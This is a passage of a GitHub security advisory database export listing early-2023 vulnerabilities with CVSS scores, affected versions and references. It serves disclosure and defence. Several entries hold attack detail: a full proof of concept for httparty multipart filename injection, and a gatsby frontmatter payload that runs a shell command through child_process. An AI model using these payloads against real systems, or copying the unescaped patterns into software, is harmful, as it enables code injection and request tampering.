'2023-01-12T17:15:00Z'}" 1.4.0,GHSA-3chw-8jq2-w769,2023-02-07T23:17:55Z,2023-01-30T00:30:34Z,,['CVE-2023-0572'],Froxlor contains Unchecked Error Condition,Unchecked Error Condition in GitHub repository froxlor/froxlor prior to 2.0.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0572'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/7b08a71c59430d06c1efb012a6c6448262aacdb1'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4ab24ee2-3ff6-4248-9555-0af3e5f754ec'}]","{'cwe_ids': ['CWE-391', 'CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T01:38:31Z', 'nvd_published_at': '2023-01-29T23:15:00Z'}" 1.4.0,GHSA-38m2-vr6g-8c94,2023-01-13T17:15:49Z,2023-01-09T12:30:18Z,,['CVE-2022-46769'],Apache Sling App CMS vulnerable to reflected Cross-site Scripting,An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-46769'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/sling-org-apache-sling-app-cms'}, {'type': 'WEB', 'url': 'https://sling.apache.org/news.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-09T21:58:35Z', 'nvd_published_at': '2023-01-09T11:15:00Z'}" 1.4.0,GHSA-qxxc-7mq4-mf79,2023-01-20T22:03:35Z,2023-01-12T06:30:24Z,,['CVE-2022-24913'],Java Merge-sort Insecure Temporary File vulnerability,"Versions of the package `com.fasterxml.util:java-merge-sort` before 1.1.0 are vulnerable to Insecure Temporary File in the `StdTempFileProvider()` function in `StdTempFileProvider.java`, which uses the permissive `File.createTempFile()` function, exposing temporary file contents.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.util:java-merge-sort'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24913'}, {'type': 'WEB', 'url': 'https://github.com/cowtowncoder/java-merge-sort/pull/21'}, {'type': 'WEB', 'url': 'https://github.com/cowtowncoder/java-merge-sort/commit/450fdee70b5f181c2afc5d817f293efa1a543902'}, {'type': 'PACKAGE', 'url': 'https://github.com/cowtowncoder/java-merge-sort'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLUTIL-3227926'}]","{'cwe_ids': ['CWE-377', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T20:55:23Z', 'nvd_published_at': '2023-01-12T05:15:00Z'}" 1.4.0,GHSA-c9pw-f4wp-22jr,2023-01-12T23:41:02Z,2023-01-08T12:30:24Z,,['CVE-2015-10030'],SUKOHI Surpass Path Traversal vulnerability,A vulnerability has been found in SUKOHI Surpass and classified as critical. This vulnerability affects unknown code of the file `src/Sukohi/Surpass/Surpass.php`. The manipulation of the argument dir leads to pathname traversal. Upgrading to version 1.0.0 can address this issue. The name of the patch is d22337d453a2a14194cdb02bf12cdf9d9f827aa7. It is recommended to upgrade the affected component. VDB-217642 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sukohi/surpass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10030'}, {'type': 'WEB', 'url': 'https://github.com/SUKOHI/Surpass/commit/d22337d453a2a14194cdb02bf12cdf9d9f827aa7'}, {'type': 'PACKAGE', 'url': 'https://github.com/SUKOHI/Surpass'}, {'type': 'WEB', 'url': 'https://github.com/SUKOHI/Surpass/releases/tag/1.0.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.217642'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.217642'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-12T23:41:02Z', 'nvd_published_at': '2023-01-08T10:15:00Z'}" 1.4.0,GHSA-5pq7-52mg-hr42,2023-01-03T13:36:46Z,2023-01-03T13:36:46Z,,[],httparty has multipart/form-data request tampering vulnerability,"### Impact I found ""multipart/form-data request tampering vulnerability"" caused by Content-Disposition ""filename"" lack of escaping in httparty. `httparty/lib/httparty/request` > `body.rb` > `def generate_multipart` https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43 By exploiting this problem, the following attacks are possible * An attack that rewrites the ""name"" field according to the crafted file name, impersonating (overwriting) another field. * Attacks that rewrite the filename extension at the time multipart/form-data is generated by tampering with the filename For example, this vulnerability can be exploited to generate the following Content-Disposition. > Normal Request example: > normal input filename: `abc.txt` > > generated normal header in multipart/form-data > `Content-Disposition: form-data; name=""avatar""; filename=""abc.txt""` > Malicious Request example > malicious input filename: `overwrite_name_field_and_extension.sh""; name=""foo""; dummy="".txt` > > generated malicious header in multipart/form-data: > `Content-Disposition: form-data; name=""avatar""; filename=""overwrite_name_field_and_extension.sh""; name=""foo""; dummy="".txt""` The Abused Header has multiple name ( `avatar` & `foo` ) fields and the ""filename"" has been rewritten from `*.txt` to `*.sh` . These problems can result in successful or unsuccessful attacks, depending on the behavior of the parser receiving the request. I have confirmed that the attack succeeds, at least in the following frameworks * Spring (Java) * Ktor (Kotlin) * Ruby on Rails (Ruby) The cause of this problem is the lack of escaping of the `""` (Double-Quote) character in Content-Disposition > filename. WhatWG's HTML spec has an escaping requirement. https://html.spec.whatwg.org/#multipart-form-data > For field names and filenames for file fields, the result of the encoding in the previous bullet point must be escaped by replacing any 0x0A (LF) bytes with the byte sequence `%0A`, 0x0D (CR) with `%0D` and 0x22 ("") with `%22`. The user agent must not perform any other escapes. ### Patches As noted at the beginning of this section, encoding must be done as described in the HTML Spec. https://html.spec.whatwg.org/#multipart-form-data > For field names and filenames for file fields, the result of the encoding in the previous bullet point must be escaped by replacing any 0x0A (LF) bytes with the byte sequence `%0A`, 0x0D (CR) with `%0D` and 0x22 ("") with `%22`. The user agent must not perform any other escapes. Therefore, it is recommended that Content-Disposition be modified by either of the following > Before: > `Content-Disposition: attachment;filename=""malicious.sh"";dummy=.txt` > After: > `Content-Disposition: attachment;filename=""%22malicious.sh%22;dummy=.txt""` https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43 ``` file_name.gsub('""', '%22') ``` Also, as for `\r`, `\n`, URL Encode is not done, but it is not newlines, so it seemed to be OK. However, since there may be omissions, it is safer to URL encode these as well, if possible. ( `\r` to `%0A` and `\d` to `%0D` ) ### PoC #### PoC Environment OS: macOS Monterey(12.3) Ruby ver: ruby 3.1.2p20 httparty ver: 0.20.0 (Python3 - HTTP Request Logging Server) ### PoC procedure (Linux or MacOS is required. This is because Windows does not allow file names containing `""` (double-quote) .) 1. Create Project ``` $ mkdir my-app $ cd my-app $ gem install httparty ``` 2. Create malicious file ``` $ touch 'overwrite_name_field_and_extension.sh""; name=""foo""; dummy="".txt' ``` 3. Generate Vuln code ``` $ vi example.rb ``` ``` require 'httparty' filename = 'overwrite_name_field_and_extension.sh""; name=""foo""; dummy="".txt' HTTParty.post('http://localhost:12345/', body: { name: 'Foo Bar', email: 'example@email.com', avatar: File.open(filename) } ) ``` 4. Run Logging Server I write Python code, but any method will work as long as you can see the HTTP Request Body. (e.g. Debugger, HTTP Logging Server, Packet Capture) $ vi logging.py ``` from http.server import HTTPServer from http.server import BaseHTTPRequestHandler class LoggingServer(BaseHTTPRequestHandler): def do_POST(self): self.send_response(200) self.end_headers() self.wfile.write(""ok"".encode(""utf-8"")) content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length) print(""POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n"", str(self.path), str(self.headers), post_data.decode('utf-8')) self.wfile.write(""POST request for {}"".format(self.path).encode('utf-8')) ip = '127.0.0.1' port = 12345 server = HTTPServer((ip, port), LoggingServer) server.serve_forever() ``` $ python logging.py 5. Run & Logging server ``` $ run example.rb ``` Return Request Header & Body: > User-Agent: Ruby > Content-Type: multipart/form-data; boundary=------------------------F857UcxRc2J1zFOz > Connection: close > Host: localhost:12345 > Content-Length: 457 > > --------------------------F857UcxRc2J1zFOz > Content-Disposition: form-data; name=""name"" > > Foo Bar > --------------------------F857UcxRc2J1zFOz > Content-Disposition: form-data; name=""email"" > > example@email.com > --------------------------F857UcxRc2J1zFOz > Content-Disposition: form-data; name=""avatar""; filename=""overwrite_name_field_and_extension.sh""; name=""foo""; dummy="".txt"" > Content-Type: text/plain > > abc > --------------------------F857UcxRc2J1zFOz-- Content-Disposition: > Content-Disposition: form-data; name=""avatar""; filename=""overwrite_name_field_and_extension.sh""; name=""foo""; dummy="".txt"" * name fields is duplicate (avator & foo) * filename & extension tampering ( .txt --> .sh ) ### References 1. I also include a similar report that I previously reported to Firefox. https://bugzilla.mozilla.org/show_bug.cgi?id=1556711 2. I will post some examples of frameworks that did not have problems as reference. Golang https://github.com/golang/go/blob/e0e0c8fe9881bbbfe689ad94ca5dddbb252e4233/src/mime/multipart/writer.go#L144 Spring https://github.com/spring-projects/spring-framework/blob/4cc91e46b210b4e4e7ed182f93994511391b54ed/spring-web/src/main/java/org/springframework/http/ContentDisposition.java#L259-L267 Symphony https://github.com/symfony/symfony/blob/123b1651c4a7e219ba59074441badfac65525efe/src/Symfony/Component/Mime/Header/ParameterizedHeader.php#L128-L133 ### For more information If you have any questions or comments about this advisory: * Email us at [kumagoro_alice@yahoo.co.jp](mailto:kumagoro_alice@yahoo.co.jp) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'httparty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.20.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42'}, {'type': 'WEB', 'url': 'https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e'}, {'type': 'PACKAGE', 'url': 'https://github.com/jnunemaker/httparty'}, {'type': 'WEB', 'url': 'https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43'}]","{'cwe_ids': ['CWE-472'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-03T13:36:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-54jw-jqr9-6cj9,2023-02-03T20:29:11Z,2023-01-26T21:30:25Z,,['CVE-2022-25962'],Command injection in vagrant.js,All versions of the package vagrant.js are vulnerable to Command Injection via the boxAdd function due to improper input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'vagrant.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25962'}, {'type': 'PACKAGE', 'url': 'https://github.com/cakecatz/vagrant.js'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-VAGRANTJS-3175614'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:07:48Z', 'nvd_published_at': '2023-01-26T21:15:00Z'}" 1.4.0,GHSA-jgh8-vchw-q3g7,2023-02-02T18:27:22Z,2023-01-27T01:04:27Z,,['CVE-2023-24622'],safeurl-python contains Server-Side Request Forgery,"### Description In SafeURL it is possible to specify a list of domains that should be matched before a request is sent out. The regex used to compare domains did not work as intended. ### Impact The regex used was: `re.match(""(?i)^%s"" % domain, value)` This has two problems, first that only the beginning and not the end of the string is anchored. Second, that a dot in the domain matches any character as part of regex syntax. Therefore, an allowlist of [""victim.com""] could allow the domain ""victimacomattacker.com"" to be requested. This has lower impact since the usual attacker aim in an SSRF is to request internal resources such as private IP addresses rather than an attacker's own domain. But, in a case where SafeURL had specifically been used to try to limit requests to a particular allowlist, say for example a PDF renderer, the finding would be more severe. ### Patches Fixed in https://github.com/IncludeSecurity/safeurl-python/pull/5 ### References [Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'safeurl-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/security/advisories/GHSA-jgh8-vchw-q3g7'}, {'type': 'WEB', 'url': 'https://github.com/IncludeSecurity/safeurl-python/pull/5/commits/42dd0c8e5fc84e17e1d3578d18aaea169eece474'}, {'type': 'PACKAGE', 'url': 'https://github.com/IncludeSecurity/safeurl-python'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:04:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-7ch4-rr99-cqcw,2023-01-23T18:42:36Z,2023-01-11T18:27:15Z,,['CVE-2023-22491'],gatsby-transformer-remark has possible unsanitized JavaScript code injection,"### Impact The gatsby-transformer-remark plugin prior to versions 5.25.1 and 6.3.2 passes input through to the `gray-matter` npm package, which is vulnerable to JavaScript injection in its default configuration, unless input is sanitized. The vulnerability is present in gatsby-transformer-remark when passing input in data mode (querying MarkdownRemark nodes via GraphQL). Injected JavaScript executes in the context of the build server. To exploit this vulnerability untrusted/unsanitized input would need to be sourced by or added into a file processed by gatsby-transformer-remark. The following payload demonstrates a vulnerable configuration: ``` ---js ((require(""child_process"")).execSync(""id >> /tmp/rce"")) --- ``` ### Patches A patch has been introduced in `gatsby-transformer-remark@5.25.1` and `gatsby-transformer-remark@6.3.2` which mitigates the issue by disabling the `gray-matter` JavaScript Frontmatter engine. The patch introduces a new option, `JSFrontmatterEngine` which is set to `false` by default. When setting `JSFrontmatterEngine` to `true`, input passed to `gatsby-plugin-mdx` must be sanitized before processing to avoid a security risk. Warnings are displayed when enabling `JSFrontmatterEngine` to `true` or if it appears that the MarkdownRemark input is attempting to use the Frontmatter engine. ### Workarounds If an older version of `gatsby-transformer-remark` must be used, input passed into the plugin should be sanitized ahead of processing. **We encourage projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner.** ### For more information Email us at [security@gatsbyjs.com](mailto:security@gatsbyjs.com).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'gatsby-transformer-remark'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.3.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'gatsby-transformer-remark'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.25.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gatsbyjs/gatsby/security/advisories/GHSA-7ch4-rr99-cqcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22491'}, {'type': 'PACKAGE', 'url': 'https://github.com/gatsbyjs/gatsby'}]","{'cwe_ids': ['CWE-20', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-11T18:27:15Z', 'nvd_published_at': '2023-01-13T19:15:00Z'}" 1.4.0,GHSA-px2f-cqrf-f2qg,2023-02-03T20:35:34Z,2023-01-26T21:30:18Z,,['CVE-2023-24452'],CSRF vulnerability in Jenkins TestQuality Updater Plugin ,A cross-site request forgery (CSRF) vulnerability in Jenkins TestQuality Updater Plugin 1.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified username and password.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:testquality-updater'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24452'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2800'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:59:08Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-6hw7-x86v-wrgf,2023-02-02T17:31:58Z,2023-01-26T21:30:18Z,,['CVE-2023-24450'],Passwords stored in plain text by Jenkins view-cloner Plugin ,"Jenkins view-cloner Plugin 1.1 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:view-cloner'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24450'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/view-cloner-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-01-24/#SECURITY-2787'}]","{'cwe_ids': ['CWE-256', 'CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T01:28:47Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-8v4j-7jgf-5rg9,2023-03-31T00:06:08Z,2023-01-31T23:33:47Z,,[],Warp vulnerable to Path Traversal via Improper validation of Windows paths,"Path resolution in `warp::filters::fs::dir` didn't correctly validate Windows paths meaning paths like `/foo/bar/c:/windows/web/screen/img101.png` would be allowed and respond with the contents of `c:/windows/web/screen/img101.png`. Thus users could potentially read files anywhere on the filesystem. This only impacts Windows. Linux and other unix likes are not impacted by this. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'warp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/seanmonstar/warp/issues/937'}, {'type': 'WEB', 'url': 'https://github.com/seanmonstar/warp/pull/997'}, {'type': 'WEB', 'url': 'https://github.com/seanmonstar/warp/commit/0074a0a3e98786509259bfe3821d3b3f094257aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/seanmonstar/warp'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2022-0082.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-31T23:33:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-5j2g-3ph4-rgvm,2023-02-07T21:18:11Z,2023-01-27T00:56:39Z,,['CVE-2021-41144'],Fix for authenticated remote code execution through layout update,"### Impact A layout block was able to bypass the block blacklist to execute remote code. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.22'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.19'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-5j2g-3ph4-rgvm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41144'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/commit/06c45940ba3256cdfc9feea12a3c0ca56d23acf8'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenMage/magento-lts'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22'}, {'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-27T00:56:39Z', 'nvd_published_at': '2023-01-27T19:15:00Z'}" 1.4.0,GHSA-g3pv-pj5f-3hfq,2023-01-20T23:35:49Z,2023-01-18T00:30:18Z,,['CVE-2021-32837'],mechanize Regular Expression Denial of Service vulnerability,"mechanize, a library for automatically interacting with HTTP web servers, contains a regular expression that is vulnerable to regular expression denial of service (ReDoS) prior to version 0.4.6. If a web server responds in a malicious way, then mechanize could crash. Version 0.4.6 has a patch for the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mechanize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32837'}, {'type': 'WEB', 'url': 'https://github.com/python-mechanize/mechanize/commit/dd05334448e9f39814bab044d2eaa5ef69b410d6'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-mechanize/mechanize'}, {'type': 'WEB', 'url': 'https://github.com/python-mechanize/mechanize/blob/3acb1836f3fd8edc5a758a417dd46b53832ae3b5/mechanize/_urllib2_fork.py#L878-L879'}, {'type': 'WEB', 'url': 'https://github.com/python-mechanize/mechanize/releases/tag/v0.4.6'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/06/msg00022.html'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-108-python-mechanize-mechanize/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-20T23:35:49Z', 'nvd_published_at': '2023-01-17T22:15:00Z'}" 1.4.0,GHSA-3cm8-v4mc-gppg,2023-09-20T21:09:18Z,2023-01-26T21:30:20Z,,['CVE-2022-4510'],Path traversal in binwalk,"A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 inclusive. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins. This vulnerability is associated with program files src/binwalk/plugins/unpfs.py. This issue affects binwalk from 2.1.2b through and including 2.3.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'binwalk'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.2b'}, {'last_affected': '2.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4510'}, {'type': 'WEB', 'url': 'https://github.com/ReFirmLabs/binwalk/pull/617'}, {'type': 'PACKAGE', 'url': 'https://github.com/ReFirmLabs/binwalk'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202309-07'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-31T20:53:49Z', 'nvd_published_at': '2023-01-26T21:18:00Z'}" 1.4.0,GHSA-vp62-m958-qj8c,2023-01-23T22:17:59Z,2023-01-04T00:30:26Z,,['CVE-2022-38723'],Gravitee API Management contains Path Traversal,"**This CVE addresses the partial fix for CVE-2019-25075** Gravitee API Management before 3.15.13 allows path traversal through HTML injection. A certain HTML injection combined with path traversal in the Email service in Gravitee API Management before 3.15.13 allows anonymous users to read arbitrary files via a /management/users/register request. A patch was published in 2019 for this vulnerability but did not appear to have solved the issue. Version 3.15.13 did remove the flaw.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.gravitee.apim:gravitee-api-management'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.15.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-38723'}, {'type': 'WEB', 'url': 'https://community.gravitee.io/t/whats-new-in-access-management-3-15-lts/164'}, {'type': 'WEB', 'url': 'https://gist.github.com/garatc/d86cdb1fa2e35a7ee719d9a0de0b5ca3'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-xc4w-28g8-vqm5'}, {'type': 'PACKAGE', 'url': 'https://github.com/gravitee-io/gravitee-api-management'}]","{'cwe_ids': ['CWE-22', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-01-06T17:21:33Z', 'nvd_published_at': '2023-01-03T22:15:00Z'}" 1.4.0,GHSA-7h75-hwxx-qpgc,2023-02-08T21:35:25Z,2023-01-27T00:30:19Z,,['CVE-2022-47951'],"OpenStack Cinder, glance, and Nova vulnerable to Path Traversal","An issue was discovered in OpenStack Cinder before 19.1.2, 20.x before 20.0.2, and 21.0.0; Glance before 23.0.1, 24.x before 24.1.1, and 25.0.0; and Nova before 24.1.2, 25.x before 25.0.2, and 26.0.0. By supplying a specially created VMDK flat image that references a specific backing file path, an authenticated user may convince systems to return a copy of that file's contents from the server, resulting in unauthorized access to potentially sensitive data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cinder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'cinder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'glance'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.0.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'glance'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.1.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nova'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '24.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nova'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '25.0.0'}, {'fixed': '25.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47951'}, {'type': 'WEB', 'url': 'https://launchpad.net/bugs/1996188'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00040.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00041.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00042.html'}, {'type': 'WEB', 'url': 'https://security.openstack.org/ossa/OSSA-2023-002.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5336'}, {'type': 'WEB', 'url': 